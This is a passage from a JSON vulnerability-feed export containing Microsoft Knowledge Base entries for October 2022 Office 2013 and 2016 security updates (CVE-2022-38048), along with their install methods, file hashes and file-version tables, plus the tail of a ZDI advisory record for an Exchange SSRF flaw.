"3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-17T00:00:00", "type": "zdi", "title": "Microsoft Exchange Autodiscover Server-Side Request Forgery Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-18T00:00:00", "id": "ZDI-22-1595", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1595/", "cvss": {"score": 0.0, "vector": "NONE"}}], "mskb": [{"lastseen": "2023-01-13T10:49:34", "description": "None\n## Summary\n\nThis security update resolves a Microsoft Office remote code execution vulnerability. To learn more about the vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2022-38048](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-38048>).\n\n**Note: **To apply this security update, you must have the release version of Microsoft Office 2016 installed on the computer.\n\nBe aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2016. It doesn't apply to the Office 2016 Click-to-Run editions, such as Microsoft Office 365 Home. (See [What version of Office am I using?](<https://support.office.com/article/About-Office-What-version-of-Office-am-I-using-932788B8-A3CE-44BF-BB09-E334518B8B19>))\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5002026>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 5002026 for the 32-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=ae76574f-1853-4d53-98bb-1fcc83a2649b>)\n * [Download security update 5002026 for the 64-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=1a5f8dc8-907a-4cf9-a4c7-80978a82413e>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [Deployments - Security Update Guide](<https://msrc.microsoft.com/update-guide/deployments>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [3115103](<https://support.microsoft.com/kb/3115103>).\n\n### File hash information\n\nFile name| SHA256 hash \n---|--- \nmsodll40ui2016-kb5002026-fullfile-x86-glb.exe| 134F56F26B451B0ECBCC316B140847246060DB295DBE17FC0EC53BACF13C3E53 \nmsodll40ui2016-kb5002026-fullfile-x64-glb.exe| 35151642D208D164B0C018B8BC627D065EB70EAAAA174AD503A5818C1D45AD9D \n \n### File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n#### \n\n__\n\nFor all supported x86-based versions of Office 2016\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmso40uires.dll| mso40uires.dll| 16.0.4684.1000| 3203824| 13-Sep-22| 06:01 \nmso40uires.dll.x86| mso40uires.dll| 16.0.4684.1000| 3203824| 13-Sep-22| 05:57 \nmso40uiwin32client.dll.x64| mso40uiwin32client.dll| 16.0.5365.1000| 9361808| 15-Sep-22| 04:45 \nmso40uiwin32client.dll.x86| mso40uiwin32client.dll| 16.0.5365.1000| 7435176| 15-Sep-22| 04:48 \n \n#### \n\n__\n\nFor all supported x64-based versions of Office 2016\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nconversion.office.mso40uires.dll| mso40uires.dll| 16.0.4666.1000| 3203816| | \nmso40uires.dll| mso40uires.dll| 16.0.4666.1000| 3203816| 13-Sep-22| 05:47 \nppt.conversion.mso40uires.dll| mso40uires.dll| 16.0.4666.1000| 3203816| | \nppt.edit.mso40uires.dll| mso40uires.dll| 16.0.4666.1000| 3203816| | \nwac.office.mso40uires.dll| mso40uires.dll| 16.0.4666.1000| 3203816| | \nmso40uires.dll| mso40uires.dll| 16.0.4684.1000| 3203824| 13-Sep-22| 05:47 \nmso40uires.dll.x86| mso40uires.dll| 16.0.4684.1000| 3203824| 13-Sep-22| 05:57 \nmso40uiwin32client.dll.x64| mso40uiwin32client.dll| 16.0.5365.1000| 9361808| 15-Sep-22| 04:45 \nmso40uiwin32client.dll.x86| mso40uiwin32client.dll| 16.0.5365.1000| 7435176| 15-Sep-22| 04:48 \n \n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2016: October 11, 2022 (KB5002026)", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-11T07:00:00", "id": "KB5002026", "href": "https://support.microsoft.com/en-us/help/5002026", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-13T10:51:36", "description": "None\n## Summary\n\nThis security update resolves a Microsoft Office remote code execution vulnerability. To learn more about the vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2022-38048](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-38048>).\n\n**Note: **To apply this security update, you must have the release version of [Service Pack 1 for Microsoft Office 2013](<https://support.microsoft.com/kb/2817430>) installed on the computer.\n\nBe aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2013. It doesn't apply to the Office 2013 Click-to-Run editions, such as Microsoft Office 365 Home. (See [What version of Office am I using?](<https://support.office.com/article/About-Office-What-version-of-Office-am-I-using-932788B8-A3CE-44BF-BB09-E334518B8B19>))\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5002279>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 5002279 for the 32-bit version of Office 2013](<http://www.microsoft.com/download/details.aspx?familyid=7bc9675d-6308-4f68-bfc5-c1b222ddd851>)\n * [Download security update 5002279 for the 64-bit version of Office 2013](<http://www.microsoft.com/download/details.aspx?familyid=1d37961b-9103-4e81-92ef-5fcb97553993>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [Deployments - Security Update Guide](<https://msrc.microsoft.com/update-guide/deployments>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [5002166](<https://support.microsoft.com/kb/5002166>).\n\n### File hash information\n\nFile name| | SHA256 hash \n---|---|--- \nmso2013-kb5002279-fullfile-x86-glb.exe| | 9E653EAA94B31D6C766709D7D43671FA84BBD8B296842006BEF7AA6C3B391E72 \nmso2013-kb5002279-fullfile-x64-glb.exe| | 9EF84B2A47050C3B2F0887F81F168BC5726FFE65813A1F23E2871516A20C1228 \n \n### File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n#### \n\n__\n\nFor all supported x86-based versions of Office 2013\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nfirstrun.exe| firstrun.exe| 15.0.5337.1000| 991624| 14-Sep-22| 01:05 \nmsointl.dll.x86.1025| msointl.dll| 15.0.5153.1000| 4330064| 15-Sep-22| 09:15 \nmsointl.dll.x86.1026| msointl.dll| 15.0.5153.1000| 3243088| 15-Sep-22| 09:15 \nmsointl.dll.x86.1027| msointl.dll| 15.0.5153.1000| 3237160| 15-Sep-22| 09:15 \nmsointl.dll.x86.1029| msointl.dll| 15.0.5153.1000| 3237968| 15-Sep-22| 09:15 \nmsointl.dll.x86.1030| msointl.dll| 15.0.5153.1000| 2988112| 15-Sep-22| 09:15 \nmsointl.dll.x86.1031| msointl.dll| 15.0.5153.1000| 3183696| 15-Sep-22| 09:14 \nmsointl.dll.x86.1032| msointl.dll| 15.0.5153.1000| 3605584| 15-Sep-22| 09:15 \nmsointl.dll.x86.3082| msointl.dll| 15.0.5153.1000| 3212368| 15-Sep-22| 09:14 \nmsointl.dll.x86.1061| msointl.dll| 15.0.5153.1000| 3000912| 15-Sep-22| 09:15 \nmsointl.dll.x86.1069| msointl.dll| 15.0.5153.1000| 3093072| 15-Sep-22| 09:15 \nmsointl.dll.x86.1035| msointl.dll| 15.0.5153.1000| 3016272| 15-Sep-22| 09:15 \nmsointl.dll.x86.1036| msointl.dll| 15.0.5153.1000| 3871312| 15-Sep-22| 09:14 \nmsointl.dll.x86.1110| msointl.dll| 15.0.5153.1000| 3151952| 15-Sep-22| 09:15 \nmsointl.dll.x86.1095| msointl.dll| 15.0.5153.1000| 3019344| 15-Sep-22| 09:15 \nmsointl.dll.x86.1037| msointl.dll| 15.0.5153.1000| 4118096| 15-Sep-22| 09:15 \nmsointl.dll.x86.1081| msointl.dll| 15.0.5153.1000| 3093072| 15-Sep-22| 09:15 \nmsointl.dll.x86.1050| msointl.dll| 15.0.5377.1000| 3096992| 15-Sep-22| 09:15 \nmsointl.dll.x86.1038| msointl.dll| 15.0.5153.1000| 3294288| 15-Sep-22| 09:15 \nmsointl.dll.x86.1057| msointl.dll| 15.0.5153.1000| 2812712| 15-Sep-22| 09:15 \nmsointl.dll.x86.1040| msointl.dll| 15.0.5153.1000| 3130448| 15-Sep-22| 09:14 \nmsointl.dll.x86.1041| msointl.dll| 15.0.5153.1000| 3093072| 15-Sep-22| 09:14 \nmsointl.dll.x86.1087| msointl.dll| 15.0.5153.1000| 3288656| 15-Sep-22| 09:15 \nmsointl.dll.x86.1099| msointl.dll| 15.0.5153.1000| 3162704| 15-Sep-22| 09:15 \nmsointl.dll.x86.1042| msointl.dll| 15.0.5153.1000| 3764304| 15-Sep-22| 09:14 \nmsointl.dll.x86.1063| msointl.dll| 15.0.5153.1000| 3245136| 15-Sep-22| 09:15 \nmsointl.dll.x86.1062| msointl.dll| 15.0.5153.1000| 3211344| 15-Sep-22| 09:15 \nmsointl.dll.x86.1086| msointl.dll| 15.0.5153.1000| 2831440| 15-Sep-22| 09:15 \nmsointl.dll.x86.1044| msointl.dll| 15.0.5153.1000| 2937936| 15-Sep-22| 09:15 \nmsointl.dll.x86.1043| msointl.dll| 15.0.5153.1000| 3098704| 15-Sep-22| 09:15 \nmsointl.dll.x86.1045| msointl.dll| 15.0.5153.1000| 3326032| 15-Sep-22| 09:15 \nmsointl.dll.x86.1046| msointl.dll| 15.0.5153.1000| 3130960| 15-Sep-22| 09:15 \nmsointl.dll.x86.2070| msointl.dll| 15.0.5153.1000| 3155536| 15-Sep-22| 09:15 \nmsointl.dll.x86.1048| msointl.dll| 15.0.5153.1000| 3270736| 15-Sep-22| 09:15 \nmsointl.dll.x86.1049| msointl.dll| 15.0.5153.1000| 3285584| 15-Sep-22| 09:15 \nmsointl.dll.x86.1051| msointl.dll| 15.0.5153.1000| 3285584| 15-Sep-22| 09:15 \nmsointl.dll.x86.1060| msointl.dll| 15.0.5153.1000| 3099432| 15-Sep-22| 09:15 \nmsointl.dll.x86.2074| msointl.dll| 15.0.5153.1000| 3141200| 15-Sep-22| 09:15 \nmsointl.dll.x86.1053| msointl.dll| 15.0.5153.1000| 2985552| 15-Sep-22| 09:15 \nmsointl.dll.x86.1054| msointl.dll| 15.0.5153.1000| 2932816| 15-Sep-22| 09:15 \nmsointl.dll.x86.1055| msointl.dll| 15.0.5153.1000| 3155024| 15-Sep-22| 09:15 \nmsointl.dll.x86.1058| msointl.dll| 15.0.5153.1000| 3265616| 15-Sep-22| 09:15 \nmsointl.dll.x86.1066| msointl.dll| 15.0.5153.1000| 3275344| 15-Sep-22| 09:15 \nmsointl.dll.x86.2052| msointl.dll| 15.0.5153.1000| 3110184| 15-Sep-22| 09:14 \nmsointl.dll.x86.1028| msointl.dll| 15.0.5153.1000| 3182672| 15-Sep-22| 09:14 \nmsointl.dll.x86.1033| msointl.dll| 15.0.5153.1000| 3819088| 14-Sep-22| 01:05 \nacmcompanion.mso.dll| mso.dll| 15.0.5493.1000| 26949048| | \nmso.dll.x86| mso.dll| 15.0.5493.1000| 26949048| 14-Sep-22| 01:05 \nmsores.dll| msores.dll| 15.0.5241.1000| 135069576| 14-Sep-22| 01:05 \nmsores.dll.x86| msores.dll| 15.0.5241.1000| 135069576| 14-Sep-22| 01:07 \nacmserver.office.dll| office.dll| 15.0.5493.1000| 460736| 14-Sep-22| 01:05 \ndcfoffice.dll| office.dll| 15.0.5493.1000| 460736| 14-Sep-22| 01:05 \ndcfoffice.dll.x86| office.dll| 15.0.5493.1000| 460736| 14-Sep-22| 01:05 \noffice.dll| office.dll| 15.0.5493.1000| 460736| 14-Sep-22| 01:05 \nmsosqm.exe| msosqm.exe| 15.0.5337.1000| 552328| 14-Sep-22| 01:05 \nmsointl.dll.idx_dll.x86.1025| msointl.dll.idx_dll| 15.0.4420.1017| 52336| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1025| msointl.rest.idx_dll| 15.0.4859.1000| 1499848| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1026| msointl.dll.idx_dll| 15.0.4460.1000| 53312| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1026| msointl.rest.idx_dll| 15.0.4859.1000| 1503424| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1027| msointl.dll.idx_dll| 15.0.4442.1000| 52848| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1027| msointl.rest.idx_dll| 15.0.4853.1000| 1476800| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1029| msointl.dll.idx_dll| 15.0.4454.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1029| msointl.rest.idx_dll| 15.0.4859.1000| 1468608| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1030| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1030| msointl.rest.idx_dll| 15.0.5015.1000| 1464496| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1031| msointl.dll.idx_dll| 15.0.4420.1017| 52864| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.1031| msointl.rest.idx_dll| 15.0.4989.1000| 1470640| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1032| msointl.dll.idx_dll| 15.0.4448.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1032| msointl.rest.idx_dll| 15.0.4859.1000| 1476288| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1033| msointl.rest.idx_dll| 15.0.4853.1000| 1493760| 14-Sep-22| 01:05 \nmsointl.rest.idx_dll.x86.3082| msointl.rest.idx_dll| 15.0.4859.1000| 1479360| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1061| msointl.dll.idx_dll| 15.0.4463.1000| 52816| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1061| msointl.rest.idx_dll| 15.0.5007.1000| 1475248| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1069| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1069| msointl.rest.idx_dll| 15.0.4853.1000| 1476800| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1035| msointl.dll.idx_dll| 15.0.4445.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1035| msointl.rest.idx_dll| 15.0.4945.1000| 1465032| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1036| msointl.rest.idx_dll| 15.0.5015.1000| 1476784| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1110| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1110| msointl.rest.idx_dll| 15.0.4853.1000| 1480384| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1095| msointl.dll.idx_dll| 15.0.4527.1000| 52392| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1095| msointl.rest.idx_dll| 15.0.4853.1000| 1488072| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1037| msointl.dll.idx_dll| 15.0.4420.1017| 52864| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1037| msointl.rest.idx_dll| 15.0.4859.1000| 1483968| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1081| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1081| msointl.rest.idx_dll| 15.0.4859.1000| 1499328| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1050| msointl.dll.idx_dll| 15.0.4460.1000| 53328| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1050| msointl.rest.idx_dll| 15.0.5377.1000| 1501080| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1038| msointl.dll.idx_dll| 15.0.4448.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1038| msointl.rest.idx_dll| 15.0.4859.1000| 1462984| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1057| msointl.dll.idx_dll| 15.0.4469.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1057| msointl.rest.idx_dll| 15.0.4859.1000| 1493184| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1040| msointl.dll.idx_dll| 15.0.4420.1017| 52336| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.1040| msointl.rest.idx_dll| 15.0.4859.1000| 1454272| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.1041| msointl.rest.idx_dll| 15.0.4859.1000| 1486024| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1087| msointl.dll.idx_dll| 15.0.4460.1000| 52288| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1087| msointl.rest.idx_dll| 15.0.4859.1000| 1472704| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1099| msointl.dll.idx_dll| 15.0.4487.1000| 52816| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1099| msointl.rest.idx_dll| 15.0.4853.1000| 1510592| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1042| msointl.dll.idx_dll| 15.0.4420.1017| 51840| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.1042| msointl.rest.idx_dll| 15.0.5007.1000| 1436336| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1063| msointl.dll.idx_dll| 15.0.4463.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1063| msointl.rest.idx_dll| 15.0.4859.1000| 1493696| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1062| msointl.dll.idx_dll| 15.0.4463.1000| 53328| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1062| msointl.rest.idx_dll| 15.0.4859.1000| 1495744| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1086| msointl.dll.idx_dll| 15.0.4469.1000| 52288| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1086| msointl.rest.idx_dll| 15.0.4859.1000| 1492680| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1044| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1044| msointl.rest.idx_dll| 15.0.4859.1000| 1460936| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1043| msointl.dll.idx_dll| 15.0.4420.1017| 52352| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1043| msointl.rest.idx_dll| 15.0.4989.1000| 1467048| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1045| msointl.dll.idx_dll| 15.0.4442.1000| 52848| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1045| msointl.rest.idx_dll| 15.0.4859.1000| 1482944| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1046| msointl.dll.idx_dll| 15.0.4420.1017| 53360| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1046| msointl.rest.idx_dll| 15.0.4859.1000| 1510088| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.2070| msointl.dll.idx_dll| 15.0.4569.1501| 52904| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.2070| msointl.rest.idx_dll| 15.0.4859.1000| 1514688| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1048| msointl.dll.idx_dll| 15.0.4448.1000| 52816| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1048| msointl.rest.idx_dll| 15.0.4859.1000| 1476808| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1049| msointl.dll.idx_dll| 15.0.4420.1017| 52848| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1049| msointl.rest.idx_dll| 15.0.4885.1000| 1469120| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1051| msointl.dll.idx_dll| 15.0.4885.1000| 62656| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1051| msointl.rest.idx_dll| 15.0.4859.1000| 1482944| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1060| msointl.dll.idx_dll| 15.0.4466.1000| 52816| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1060| msointl.rest.idx_dll| 15.0.4859.1000| 1484488| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.2074| msointl.dll.idx_dll| 15.0.4460.1000| 53312| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.2074| msointl.rest.idx_dll| 15.0.4945.1000| 1501376| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1053| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1053| msointl.rest.idx_dll| 15.0.5031.1000| 1461936| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1054| msointl.dll.idx_dll| 15.0.4448.1000| 52288| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1054| msointl.rest.idx_dll| 15.0.4893.1000| 1450176| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1055| msointl.dll.idx_dll| 15.0.4448.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1055| msointl.rest.idx_dll| 15.0.4859.1000| 1483968| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1058| msointl.dll.idx_dll| 15.0.4454.1000| 53312| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1058| msointl.rest.idx_dll| 15.0.4859.1000| 1486016| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1066| msointl.dll.idx_dll| 15.0.4481.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1066| msointl.rest.idx_dll| 15.0.4859.1000| 1525448| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.2052| msointl.dll.idx_dll| 15.0.4420.1017| 52336| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.2052| msointl.rest.idx_dll| 15.0.4997.1000| 1464496| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1028| msointl.dll.idx_dll| 15.0.4420.1017| 51840| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.1028| msointl.rest.idx_dll| 15.0.4997.1000| 1448112| 15-Sep-22| 09:14 \nfirstrun.veman.xml| firstrun.visualelementsmanifest.xml| | 344| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale100.png| excellogo.contrast-black_scale-100.png| | 1657| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale140.png| excellogo.contrast-black_scale-140.png| | 2571| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale180.png| excellogo.contrast-black_scale-180.png| | 3253| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale80.png| excellogo.contrast-black_scale-80.png| | 1288| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale100.png| excellogo.contrast-white_scale-100.png| | 1649| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale140.png| excellogo.contrast-white_scale-140.png| | 2556| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale180.png| excellogo.contrast-white_scale-180.png| | 3290| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale80.png| excellogo.contrast-white_scale-80.png| | 1303| 14-Sep-22| 01:05 \nexcellogo.scale100.png| excellogo.scale-100.png| | 1706| 14-Sep-22| 01:05 \nexcellogo.scale140.png| excellogo.scale-140.png| | 2511| 14-Sep-22| 01:05 \nexcellogo.scale180.png| excellogo.scale-180.png| | 3120| 14-Sep-22| 01:05 \nexcellogo.scale80.png| excellogo.scale-80.png| | 1402| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale100.png| excellogosmall.contrast-black_scale-100.png| | 1085| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale140.png| excellogosmall.contrast-black_scale-140.png| | 1339| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale180.png| excellogosmall.contrast-black_scale-180.png| | 2028| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale80.png| excellogosmall.contrast-black_scale-80.png| | 811| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale100.png| excellogosmall.contrast-white_scale-100.png| | 1053| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale140.png| excellogosmall.contrast-white_scale-140.png| | 1315| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale180.png| excellogosmall.contrast-white_scale-180.png| | 1927| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale80.png| excellogosmall.contrast-white_scale-80.png| | 772| 14-Sep-22| 01:05 \nexcellogosmall.scale100.png| excellogosmall.scale-100.png| | 1208| 14-Sep-22| 01:05 \nexcellogosmall.scale140.png| excellogosmall.scale-140.png| | 1454| 14-Sep-22| 01:05 \nexcellogosmall.scale180.png| excellogosmall.scale-180.png| | 2015| 14-Sep-22| 01:05 \nexcellogosmall.scale80.png| excellogosmall.scale-80.png| | 886| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale100.png| firstrunlogo.contrast-black_scale-100.png| | 1125| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale140.png| firstrunlogo.contrast-black_scale-140.png| | 1689| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale180.png| firstrunlogo.contrast-black_scale-180.png| | 2181| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale80.png| firstrunlogo.contrast-black_scale-80.png| | 850| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale100.png| firstrunlogo.contrast-white_scale-100.png| | 1196| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale140.png| firstrunlogo.contrast-white_scale-140.png| | 1817| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale180.png| firstrunlogo.contrast-white_scale-180.png| | 2352| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale80.png| firstrunlogo.contrast-white_scale-80.png| | 901| 14-Sep-22| 01:05 \nfirstrunlogo.scale100.png| firstrunlogo.scale-100.png| | 15557| 14-Sep-22| 01:05 \nfirstrunlogo.scale140.png| firstrunlogo.scale-140.png| | 16184| 14-Sep-22| 01:05 \nfirstrunlogo.scale180.png| firstrunlogo.scale-180.png| | 16534| 14-Sep-22| 01:05 \nfirstrunlogo.scale80.png| firstrunlogo.scale-80.png| | 15298| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale100.png| firstrunlogosmall.contrast-black_scale-100.png| | 682| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale140.png| firstrunlogosmall.contrast-black_scale-140.png| | 932| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale180.png| firstrunlogosmall.contrast-black_scale-180.png| | 1295| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale80.png| firstrunlogosmall.contrast-black_scale-80.png| | 497| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastwhite_scale100.png| firstrunlogosmall.contrast-white_scale-100.png| | 737| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastwhite_scale140.png| firstrunlogosmall.contrast-white_scale-140.png| | 981| 14-Sep-22| 01:05 